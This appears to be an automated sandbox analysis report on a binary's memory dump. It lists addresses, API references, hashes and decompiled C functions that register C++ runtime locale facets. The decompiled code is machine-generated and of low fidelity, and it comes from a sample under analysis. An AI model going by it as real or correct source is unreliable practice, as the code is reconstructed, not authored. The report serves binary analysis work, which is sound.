0x0048ce46
0x0048ce8b
0x0048ce8e
0x0048ce9a
0x0048ce48
0x0048ce48
0x0048ce4a
0x0048ce50
0x0048ce56
0x0048ce5e
0x0048ce61
0x0048ce9b
0x0048cea0
0x0048cea1
0x0048cea8
0x0048ceb2
0x0048ceb7
0x0048cec2
0x0048cec6
0x0048ced7
0x0048ced9
0x0048cedb
0x0048cf20
0x0048cf23
0x0048cf2f
0x0048cedd
0x0048cedd
0x0048cedf
0x0048cee5
0x0048ceeb
0x0048cef3
0x0048cef6
0x0048cf30
0x0048cf35
0x0048cf36
0x0048cf3d
0x0048cf47
0x0048cf4c
0x0048cf57
0x0048cf5b
0x0048cf6c
0x0048cf6e
0x0048cf70
0x0048cfb5
0x0048cfb8
0x0048cfc4
0x0048cf72
0x0048cf72
0x0048cf74
0x0048cf7a
0x0048cf80
0x0048cf88
0x0048cf8b
0x0048cfc5
0x0048cfca
0x0048cfcb
0x0048cfd2
0x0048cfdc
0x0048cfe1
0x0048cfec
0x0048cff0
0x0048d001
0x0048d003
0x0048d005
0x0048d04a
0x0048d04d
0x0048d059
0x0048d007
0x0048d007
0x0048d009
0x0048d00f
0x0048d015
0x0048d016
0x0048d01c
0x0048d01d
0x0048d020
0x0048d05a
0x0048d05f
0x0048d063
0x0048d067
0x0048d06b
0x0048d06b
0x0048d06b
0x0048d06f
0x0048d076
0x0048d079
0x0048d082
0x0048d022
0x0048d022
0x0048d025
0x0048d029
0x0048d02d
0x0048d03a
0x0048d042
0x0048d044
0x00000000
0x0048d044
0x0048d00b
0x0048d00b
0x00000000
0x0048d00b
0x0048d009
0x0048cf8d
0x0048cf8d
0x0048cf90
0x0048cf94
0x0048cf98
0x0048cfa5
0x0048cfad
0x0048cfaf
0x00000000
0x0048cfaf
0x0048cf76
0x0048cf76
0x00000000
0x0048cf76
0x0048cf74
0x0048cef8
0x0048cef8
0x0048cefb
0x0048ceff
0x0048cf03
0x0048cf10
0x0048cf18
0x0048cf1a
0x00000000
0x0048cf1a
0x0048cee1
0x0048cee1
0x00000000
0x0048cee1
0x0048cedf
0x0048ce63
0x0048ce63
0x0048ce66
0x0048ce6a
0x0048ce6e
0x0048ce7b
0x0048ce83
0x0048ce85
0x00000000
0x0048ce85
0x0048ce4c
0x0048ce4c
0x00000000
0x0048ce4c
0x0048ce4a
0x0048cdce
0x0048cdce
0x0048cdd1
0x0048cdd5
0x0048cdd9
0x0048cde6
0x0048cdee
0x0048cdf0
0x00000000
0x0048cdf0
0x0048cdb7
0x0048cdb7
0x00000000
0x0048cdb7
0x0048cdb5
0x0048cd39
0x0048cd39
0x0048cd3c
0x0048cd40
0x0048cd44
0x0048cd51
0x0048cd59
0x0048cd5b
0x00000000
0x0048cd5b
0x0048cd22
0x0048cd22
0x00000000
0x0048cd22
0x0048cd20

APIs

__EH_prolog3.LIBCMT ref: 0048CCE9
std::_Lockit::_Lockit.LIBCPMT ref: 0048CCF3

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

numpunct.LIBCPMT ref: 0048CD2D
std::_Facet_Register.LIBCPMT ref: 0048CD44
std::_Lockit::~_Lockit.LIBCPMT ref: 0048CD64
Concurrency::cancel_current_task.LIBCPMT ref: 0048CD71

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Registernumpunct
String ID:
API String ID: 2374177825-0
Opcode ID: 367ebb04587d87fade31d1f9f7d0bc185edd064d42c03fc606f47292d501d2ab
Instruction ID: 8c87d4b2a5c4ce9837a0f1ad041f8c33bf239e2224542b802fa9165208752077
Opcode Fuzzy Hash: 367ebb04587d87fade31d1f9f7d0bc185edd064d42c03fc606f47292d501d2ab
Instruction Fuzzy Hash: 7401E1359002158BCB01FBA5D8996BE7BA0AF80324F14081EE4106B382CF789D01C798

Uniqueness

Uniqueness Score: -1.00%

Function 0048CD77, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0048CD77(intOrPtr _a8) {
				signed int _v4;
				signed int _v16;
				char _v20;
				void* _v56;
				signed int _t69;
				void* _t118;
				short* _t172;
				void* _t188;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t194;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				signed int _t198;
				signed int _t199;
				short* _t200;
				void* _t210;
				void* _t211;

				_push(8);
				E0049D90B(0x4d6966, _t188, _t194);
				E00488DEA( &_v20, 0);
				_t195 =  *0x4eddd8; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t195;
				_t69 = E0042B315(_a8, E0042B22E(0x4edd84, _t188, _t195, _t211));
				_t189 = _t69;
				if(_t69 != 0) {
					L5:
					E00488E42( &_v20);
					return E0049D8D4(_t189);
				} else {
					if(_t195 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E0048E682(_t189, _t195, __eflags) - 0xffffffff;
						if(__eflags == 0) {
							E0042B042(__eflags);
							asm("int3");
							_push(8);
							E0049D90B(0x4d6966, _t189, _t195);
							E00488DEA( &_v20, 0);
							_t196 =  *0x4ede24; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t196;
							_t190 = E0042B315(_a8, E0042B22E(0x4eddc8, _t189, _t196, __eflags));
							__eflags = _t190;
							if(_t190 != 0) {
								L12:
								E00488E42( &_v20);
								return E0049D8D4(_t190);
							} else {
								__eflags = _t196;
								if(__eflags == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E0048E6FD(_t190, _t196, __eflags) - 0xffffffff;
									if(__eflags == 0) {
										E0042B042(__eflags);
										asm("int3");
										_push(8);
										E0049D90B(0x4d6966, _t190, _t196);
										E00488DEA( &_v20, 0);
										_t197 =  *0x4eddf4; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t197;
										_t191 = E0042B315(_a8, E0042B22E(0x4edda0, _t190, _t197, __eflags));
										__eflags = _t191;
										if(_t191 != 0) {
											L19:
											E00488E42( &_v20);
											return E0049D8D4(_t191);
										} else {
											__eflags = _t197;
											if(__eflags == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E0048E769(_t191, _t197, __eflags) - 0xffffffff;
												if(__eflags == 0) {
													E0042B042(__eflags);
													asm("int3");
													_push(8);
													E0049D90B(0x4d6966, _t191, _t197);
													E00488DEA( &_v20, 0);
													_t198 =  *0x4ede28; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t198;
													_t192 = E0042B315(_a8, E0042B22E(0x4eddcc, _t191, _t198, __eflags));
													__eflags = _t192;
													if(_t192 != 0) {
														L26:
														E00488E42( &_v20);
														return E0049D8D4(_t192);
													} else {
														__eflags = _t198;
														if(__eflags == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E0048E7D5(_t192, _t198, __eflags) - 0xffffffff;
															if(__eflags == 0) {
																E0042B042(__eflags);
																asm("int3");
																_push(8);
																E0049D90B(0x4d6966, _t192, _t198);
																E00488DEA( &_v20, 0);
																_t199 =  *0x4eddf8; // 0x0
																_v4 = _v4 & 0x00000000;
																_v16 = _t199;
																_t193 = E0042B315(_a8, E0042B22E(0x4edd78, _t192, _t199, __eflags));
																__eflags = _t193;
																if(_t193 != 0) {
																	L33:
																	E00488E42( &_v20);
																	return E0049D8D4(_t193);
																} else {
																	__eflags = _t199;
																	if(__eflags == 0) {
																		_push(_a8);
																		_push( &_v16);
																		_t118 = E0048E849(_t193, _t199, __eflags);
																		_pop(_t172);
																		__eflags = _t118 - 0xffffffff;
																		if(__eflags == 0) {
																			E0042B042(__eflags);
																			asm("int3");
																			_push(_t199);
																			_t200 = _t172;
																			_t62 = _t200 + 0x10;
																			 *_t62 =  *(_t200 + 0x10) & 0x00000000;
																			__eflags =  *_t62;
																			 *((intOrPtr*)(_t200 + 0x14)) = 7;
																			 *_t200 = 0;
																			E00494BE0( *((intOrPtr*)(_t210 + 8)));
																			return _t200;
																		} else {
																			_t193 = _v16;
																			_v16 = _t193;
																			_v4 = 1;
																			E0048919D(_t193);
																			 *0x4f02b4();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t193 + 4))))();
																			 *0x4eddf8 = _t193;
																			goto L33;
																		}
																	} else {
																		_t193 = _t199;
																		goto L33;
																	}
																}
															} else {
																_t192 = _v16;
																_v16 = _t192;
																_v4 = 1;
																E0048919D(_t192);
																 *0x4f02b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t192 + 4))))();
																 *0x4ede28 = _t192;
																goto L26;
															}
														} else {
															_t192 = _t198;
															goto L26;
														}
													}
												} else {
													_t191 = _v16;
													_v16 = _t191;
													_v4 = 1;
													E0048919D(_t191);
													 *0x4f02b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t191 + 4))))();
													 *0x4eddf4 = _t191;
													goto L19;
												}
											} else {
												_t191 = _t197;
												goto L19;
											}
										}
									} else {
										_t190 = _v16;
										_v16 = _t190;
										_v4 = 1;
										E0048919D(_t190);
										 *0x4f02b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t190 + 4))))();
										 *0x4ede24 = _t190;
										goto L12;
									}
								} else {
									_t190 = _t196;
									goto L12;
								}
							}
						} else {
							_t189 = _v16;
							_v16 = _t189;
							_v4 = 1;
							E0048919D(_t189);
							 *0x4f02b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t189 + 4))))();
							 *0x4eddd8 = _t189;
							goto L5;
						}
					} else {
						_t189 = _t195;
						goto L5;
					}
				}
			}

0x0048cd77
0x0048cd7e
0x0048cd88
0x0048cd8d
0x0048cd98
0x0048cd9c
0x0048cda8
0x0048cdad
0x0048cdb1
0x0048cdf6
0x0048cdf9
0x0048ce05
0x0048cdb3
0x0048cdb5
0x0048cdbb
0x0048cdc1
0x0048cdc9
0x0048cdcc
0x0048ce06
0x0048ce0b
0x0048ce0c
0x0048ce13
0x0048ce1d
0x0048ce22
0x0048ce2d
0x0048ce31
0x0048ce42
0x0048ce44
0x0048ce46
0x0048ce8b
0x0048ce8e
0x0048ce9a
0x0048ce48
0x0048ce48
0x0048ce4a
0x0048ce50
0x0048ce56
0x0048ce5e
0x0048ce61
0x0048ce9b
0x0048cea0
0x0048cea1
0x0048cea8
0x0048ceb2
0x0048ceb7
0x0048cec2
0x0048cec6
0x0048ced7
0x0048ced9
0x0048cedb
0x0048cf20
0x0048cf23
0x0048cf2f
0x0048cedd
0x0048cedd
0x0048cedf
0x0048cee5
0x0048ceeb
0x0048cef3
0x0048cef6
0x0048cf30
0x0048cf35
0x0048cf36
0x0048cf3d
0x0048cf47
0x0048cf4c
0x0048cf57
0x0048cf5b
0x0048cf6c
0x0048cf6e
0x0048cf70
0x0048cfb5
0x0048cfb8
0x0048cfc4
0x0048cf72
0x0048cf72
0x0048cf74
0x0048cf7a
0x0048cf80
0x0048cf88
0x0048cf8b
0x0048cfc5
0x0048cfca
0x0048cfcb
0x0048cfd2
0x0048cfdc
0x0048cfe1
0x0048cfec
0x0048cff0
0x0048d001
0x0048d003
0x0048d005
0x0048d04a
0x0048d04d
0x0048d059
0x0048d007
0x0048d007
0x0048d009
0x0048d00f
0x0048d015
0x0048d016
0x0048d01c
0x0048d01d
0x0048d020
0x0048d05a
0x0048d05f
0x0048d063
0x0048d067
0x0048d06b
0x0048d06b
0x0048d06b
0x0048d06f
0x0048d076
0x0048d079
0x0048d082
0x0048d022
0x0048d022
0x0048d025
0x0048d029
0x0048d02d
0x0048d03a
0x0048d042
0x0048d044
0x00000000
0x0048d044
0x0048d00b
0x0048d00b
0x00000000
0x0048d00b
0x0048d009
0x0048cf8d
0x0048cf8d
0x0048cf90
0x0048cf94
0x0048cf98
0x0048cfa5
0x0048cfad
0x0048cfaf
0x00000000
0x0048cfaf
0x0048cf76
0x0048cf76
0x00000000
0x0048cf76
0x0048cf74
0x0048cef8
0x0048cef8
0x0048cefb
0x0048ceff
0x0048cf03
0x0048cf10
0x0048cf18
0x0048cf1a
0x00000000
0x0048cf1a
0x0048cee1
0x0048cee1
0x00000000
0x0048cee1
0x0048cedf
0x0048ce63
0x0048ce63
0x0048ce66
0x0048ce6a
0x0048ce6e
0x0048ce7b
0x0048ce83
0x0048ce85
0x00000000
0x0048ce85
0x0048ce4c
0x0048ce4c
0x00000000
0x0048ce4c
0x0048ce4a
0x0048cdce
0x0048cdce
0x0048cdd1
0x0048cdd5
0x0048cdd9
0x0048cde6
0x0048cdee
0x0048cdf0
0x00000000
0x0048cdf0
0x0048cdb7
0x0048cdb7
0x00000000
0x0048cdb7
0x0048cdb5

APIs

__EH_prolog3.LIBCMT ref: 0048CD7E
std::_Lockit::_Lockit.LIBCPMT ref: 0048CD88

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

numpunct.LIBCPMT ref: 0048CDC2
std::_Facet_Register.LIBCPMT ref: 0048CDD9
std::_Lockit::~_Lockit.LIBCPMT ref: 0048CDF9
Concurrency::cancel_current_task.LIBCPMT ref: 0048CE06

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Registernumpunct
String ID:
API String ID: 2374177825-0
Opcode ID: ef13acadf03ad1f7fc320985d595e2b29bda19a08db9f3b729d9241fa1a35930
Instruction ID: 6c0a9b1e10a7c71c3c8324c33f60b81c870842f5402ba6e9a3eb8f35da619dfa
Opcode Fuzzy Hash: ef13acadf03ad1f7fc320985d595e2b29bda19a08db9f3b729d9241fa1a35930
Instruction Fuzzy Hash: 9701C475D001158BCB06FB65D8956BE7BA1AF84314F55095FE8116B382CF3C9E01C79D

Uniqueness

Uniqueness Score: -1.00%

Function 0048C268, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0048C26F
std::_Lockit::_Lockit.LIBCPMT ref: 0048C279

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

codecvt.LIBCPMT ref: 0048C2B3
std::_Facet_Register.LIBCPMT ref: 0048C2CA
std::_Lockit::~_Lockit.LIBCPMT ref: 0048C2EA
Concurrency::cancel_current_task.LIBCPMT ref: 0048C2F7

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Registercodecvt
String ID:
API String ID: 878568432-0
Opcode ID: f9b42739db0fe4ad26672f8d983802dcc547d66bd66853f7c03e4a294528a55f
Instruction ID: a07ac3cf4498590bcecd5019c5e677d058efcd5d06127725674c0da307080c16
Opcode Fuzzy Hash: f9b42739db0fe4ad26672f8d983802dcc547d66bd66853f7c03e4a294528a55f
Instruction Fuzzy Hash: 74018B75D001158BCB05BBA5D85A6BE77A1AF84714F15485EE810AB3C2CF789A018B9D

Uniqueness

Uniqueness Score: -1.00%

Function 0048C2FD, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0048C304
std::_Lockit::_Lockit.LIBCPMT ref: 0048C30E

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

collate.LIBCPMT ref: 0048C348
std::_Facet_Register.LIBCPMT ref: 0048C35F
std::_Lockit::~_Lockit.LIBCPMT ref: 0048C37F
Concurrency::cancel_current_task.LIBCPMT ref: 0048C38C

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Registercollate
String ID:
API String ID: 573010341-0
Opcode ID: 861243e1b40f4f5d8644a9a4d2485914ea0786fc84b9d1768308d0f4417d1a5b
Instruction ID: 5a85bc5e0a4dc8438c54092ff9485234fb8d1cfe33051ea2e634e47832a3e707
Opcode Fuzzy Hash: 861243e1b40f4f5d8644a9a4d2485914ea0786fc84b9d1768308d0f4417d1a5b
Instruction Fuzzy Hash: B001C431D005158BCB05FB65D8556BE7761AF54314F14481FE8106B382CF7C9D01CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0048C392, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0048C399
std::_Lockit::_Lockit.LIBCPMT ref: 0048C3A3

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

collate.LIBCPMT ref: 0048C3DD
std::_Facet_Register.LIBCPMT ref: 0048C3F4
std::_Lockit::~_Lockit.LIBCPMT ref: 0048C414
Concurrency::cancel_current_task.LIBCPMT ref: 0048C421

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Registercollate
String ID:
API String ID: 573010341-0
Opcode ID: 78c74b463a8d9d377448b36629b9684b765f7e652d2abdbdec0817c85c5587c9
Instruction ID: 00870072261c423a6edadfb462aac9a5278ee703ea957f486b9ff1465d2d4d7e
Opcode Fuzzy Hash: 78c74b463a8d9d377448b36629b9684b765f7e652d2abdbdec0817c85c5587c9
Instruction Fuzzy Hash: 8A01C035D001298BCB05FBA5D8A5ABE7771AF84714F14485FE812AB382CF7C9E018B99

Uniqueness

Uniqueness Score: -1.00%

Function 0048C427, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0048C427(intOrPtr _a8) {
				signed int _v4;
				signed int _v16;
				char _v20;
				void* _v248;
				signed int _t261;
				void* _t486;
				short* _t700;
				void* _t764;
				signed int _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t785;
				void* _t786;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t795;
				signed int _t796;
				signed int _t797;
				signed int _t798;
				signed int _t799;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				signed int _t805;
				signed int _t806;
				signed int _t807;
				short* _t808;
				void* _t834;
				void* _t835;

				_push(8);
				L0049D90B(0x4d6966, _t764, _t786);
				L00488DEA( &_v20, 0);
				_t787 =  *0x4eddfc; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t787;
				_t261 = E0042B315(_a8, E0042B22E(0x4ed910, _t764, _t787, _t835));
				_t765 = _t261;
				if(_t261 != 0) {
					L5:
					L00488E42( &_v20);
					return L0049D8D4(_t765);
				} else {
					if(_t787 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = L0048DF75(_t765, _t787, __eflags) - 0xffffffff;
						if(__eflags == 0) {
							E0042B042(__eflags);
							asm("int3");
							_push(8);
							L0049D90B(0x4d6966, _t765, _t787);
							L00488DEA( &_v20, 0);
							_t788 =  *0x4ede10; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t788;
							_t766 = E0042B315(_a8, E0042B22E(0x4eddb4, _t765, _t788, __eflags));
							__eflags = _t766;
							if(_t766 != 0) {
								L12:
								L00488E42( &_v20);
								return L0049D8D4(_t766);
							} else {
								__eflags = _t788;
								if(__eflags == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = L0048DFE5(_t766, _t788, __eflags) - 0xffffffff;
									if(__eflags == 0) {
										E0042B042(__eflags);
										asm("int3");
										_push(8);
										L0049D90B(0x4d6966, _t766, _t788);
										L00488DEA( &_v20, 0);
										_t789 =  *0x4edde0; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t789;
										_t767 = E0042B315(_a8, E0042B22E(0x4edd8c, _t766, _t789, __eflags));
										__eflags = _t767;
										if(_t767 != 0) {
											L19:
											L00488E42( &_v20);
											return L0049D8D4(_t767);
										} else {
											__eflags = _t789;
											if(__eflags == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E0048E04D(_t767, _t789, __eflags) - 0xffffffff;
												if(__eflags == 0) {
													E0042B042(__eflags);
													asm("int3");
													_push(8);
													L0049D90B(0x4d6966, _t767, _t789);
													L00488DEA( &_v20, 0);
													_t790 =  *0x4ede14; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t790;
													_t768 = E0042B315(_a8, E0042B22E(0x4eddb8, _t767, _t790, __eflags));
													__eflags = _t768;
													if(_t768 != 0) {
														L26:
														L00488E42( &_v20);
														return L0049D8D4(_t768);
													} else {
														__eflags = _t790;
														if(__eflags == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E0048E0B5(_t768, _t790, __eflags) - 0xffffffff;
															if(__eflags == 0) {
																E0042B042(__eflags);
																asm("int3");
																_push(8);
																L0049D90B(0x4d6966, _t768, _t790);
																L00488DEA( &_v20, 0);
																_t791 =  *0x4edde4; // 0x0
																_v4 = _v4 & 0x00000000;
																_v16 = _t791;
																_t769 = E0042B315(_a8, E0042B22E(0x4edd90, _t768, _t791, __eflags));
																__eflags = _t769;
																if(_t769 != 0) {
																	L33:
																	L00488E42( &_v20);
																	return L0049D8D4(_t769);
																} else {
																	__eflags = _t791;
																	if(__eflags == 0) {
																		_push(_a8);
																		_push( &_v16);
																		__eflags = E0048E11D(_t769, _t791, __eflags) - 0xffffffff;
																		if(__eflags == 0) {
																			E0042B042(__eflags);
																			asm("int3");
																			_push(8);
																			L0049D90B(0x4d6966, _t769, _t791);
																			L00488DEA( &_v20, 0);
																			_t792 =  *0x4ede18; // 0x0
																			_v4 = _v4 & 0x00000000;
																			_v16 = _t792;
																			_t770 = E0042B315(_a8, E0042B22E(0x4eddbc, _t769, _t792, __eflags));
																			__eflags = _t770;
																			if(_t770 != 0) {
																				L40:
																				L00488E42( &_v20);
																				return L0049D8D4(_t770);
																			} else {
																				__eflags = _t792;
																				if(__eflags == 0) {
																					_push(_a8);
																					_push( &_v16);
																					__eflags = E0048E185(_t770, _t792, __eflags) - 0xffffffff;
																					if(__eflags == 0) {
																						E0042B042(__eflags);
																						asm("int3");
																						_push(8);
																						L0049D90B(0x4d6966, _t770, _t792);
																						L00488DEA( &_v20, 0);
																						_t793 =  *0x4edde8; // 0x0
																						_v4 = _v4 & 0x00000000;
																						_v16 = _t793;
																						_t771 = E0042B315(_a8, E0042B22E(0x4edd94, _t770, _t793, __eflags));
																						__eflags = _t771;
																						if(_t771 != 0) {
																							L47:
																							L00488E42( &_v20);
																							return L0049D8D4(_t771);
																						} else {
																							__eflags = _t793;
																							if(__eflags == 0) {
																								_push(_a8);
																								_push( &_v16);
																								__eflags = E0048E1ED(_t771, _t793, __eflags) - 0xffffffff;
																								if(__eflags == 0) {
																									E0042B042(__eflags);
																									asm("int3");
																									_push(8);
																									L0049D90B(0x4d6966, _t771, _t793);
																									L00488DEA( &_v20, 0);
																									_t794 =  *0x4ede20;
																									_v4 = _v4 & 0x00000000;
																									_v16 = _t794;
																									_t772 = E0042B315(_a8, E0042B22E(0x4eddc4, _t771, _t794, __eflags));
																									__eflags = _t772;
																									if(_t772 != 0) {
																										L54:
																										L00488E42( &_v20);
																										return L0049D8D4(_t772);
																									} else {
																										__eflags = _t794;
																										if(__eflags == 0) {
																											_push(_a8);
																											_push( &_v16);
																											__eflags = E0048E255(_t772, _t794, __eflags) - 0xffffffff;
																											if(__eflags == 0) {
																												E0042B042(__eflags);
																												asm("int3");
																												_push(8);
																												L0049D90B(0x4d6966, _t772, _t794);
																												L00488DEA( &_v20, 0);
																												_t795 =  *0x4ede1c;
																												_v4 = _v4 & 0x00000000;
																												_v16 = _t795;
																												_t773 = E0042B315(_a8, E0042B22E(0x4eddc0, _t772, _t795, __eflags));
																												__eflags = _t773;
																												if(_t773 != 0) {
																													L61:
																													L00488E42( &_v20);
																													return L0049D8D4(_t773);
																												} else {
																													__eflags = _t795;
																													if(__eflags == 0) {
																														_push(_a8);
																														_push( &_v16);
																														__eflags = E0048E2D9(_t773, _t795, __eflags) - 0xffffffff;
																														if(__eflags == 0) {
																															E0042B042(__eflags);
																															asm("int3");
																															_push(8);
																															L0049D90B(0x4d6966, _t773, _t795);
																															L00488DEA( &_v20, 0);
																															_t796 =  *0x4eddf0;
																															_v4 = _v4 & 0x00000000;
																															_v16 = _t796;
																															_t774 = E0042B315(_a8, E0042B22E(0x4edd9c, _t773, _t796, __eflags));
																															__eflags = _t774;
																															if(_t774 != 0) {
																																L68:
																																L00488E42( &_v20);
																																return L0049D8D4(_t774);
																															} else {
																																__eflags = _t796;
																																if(__eflags == 0) {
																																	_push(_a8);
																																	_push( &_v16);
																																	__eflags = E0048E35E(_t774, _t796, __eflags) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E0042B042(__eflags);
																																		asm("int3");
																																		_push(8);
																																		L0049D90B(0x4d6966, _t774, _t796);
																																		L00488DEA( &_v20, 0);
																																		_t797 =  *0x4eddec;
																																		_v4 = _v4 & 0x00000000;
																																		_v16 = _t797;
																																		_t775 = E0042B315(_a8, E0042B22E(0x4edd98, _t774, _t797, __eflags));
																																		__eflags = _t775;
																																		if(_t775 != 0) {
																																			L75:
																																			L00488E42( &_v20);
																																			return L0049D8D4(_t775);
																																		} else {
																																			__eflags = _t797;
																																			if(__eflags == 0) {
																																				_push(_a8);
																																				_push( &_v16);
																																				__eflags = E0048E3E2(_t775, _t797, __eflags) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E0042B042(__eflags);
																																					asm("int3");
																																					_push(8);
																																					L0049D90B(0x4d6966, _t775, _t797);
																																					L00488DEA( &_v20, 0);
																																					_t798 =  *0x4ede00;
																																					_v4 = _v4 & 0x00000000;
																																					_v16 = _t798;
																																					_t776 = E0042B315(_a8, E0042B22E(0x4edda4, _t775, _t798, __eflags));
																																					__eflags = _t776;
																																					if(_t776 != 0) {
																																						L82:
																																						L00488E42( &_v20);
																																						return L0049D8D4(_t776);
																																					} else {
																																						__eflags = _t798;
																																						if(__eflags == 0) {
																																							_push(_a8);
																																							_push( &_v16);
																																							__eflags = E0048E467(_t776, _t798, __eflags) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E0042B042(__eflags);
																																								asm("int3");
																																								_push(8);
																																								L0049D90B(0x4d6966, _t776, _t798);
																																								L00488DEA( &_v20, 0);
																																								_t799 =  *0x4eddd0;
																																								_v4 = _v4 & 0x00000000;
																																								_v16 = _t799;
																																								_t777 = E0042B315(_a8, E0042B22E(0x4edd7c, _t776, _t799, __eflags));
																																								__eflags = _t777;
																																								if(_t777 != 0) {
																																									L89:
																																									L00488E42( &_v20);
																																									return L0049D8D4(_t777);
																																								} else {
																																									__eflags = _t799;
																																									if(__eflags == 0) {
																																										_push(_a8);
																																										_push( &_v16);
																																										__eflags = E0048E4CF(_t777, _t799, __eflags) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E0042B042(__eflags);
																																											asm("int3");
																																											_push(8);
																																											L0049D90B(0x4d6966, _t777, _t799);
																																											L00488DEA( &_v20, 0);
																																											_t800 =  *0x4ede04;
																																											_v4 = _v4 & 0x00000000;
																																											_v16 = _t800;
																																											_t778 = E0042B315(_a8, E0042B22E(0x4edda8, _t777, _t800, __eflags));
																																											__eflags = _t778;
																																											if(_t778 != 0) {
																																												L96:
																																												L00488E42( &_v20);
																																												return L0049D8D4(_t778);
																																											} else {
																																												__eflags = _t800;
																																												if(__eflags == 0) {
																																													_push(_a8);
																																													_push( &_v16);
																																													__eflags = E0048E537(_t778, _t800, __eflags) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E0042B042(__eflags);
																																														asm("int3");
																																														_push(8);
																																														L0049D90B(0x4d6966, _t778, _t800);
																																														L00488DEA( &_v20, 0);
																																														_t801 =  *0x4eddd4;
																																														_v4 = _v4 & 0x00000000;
																																														_v16 = _t801;
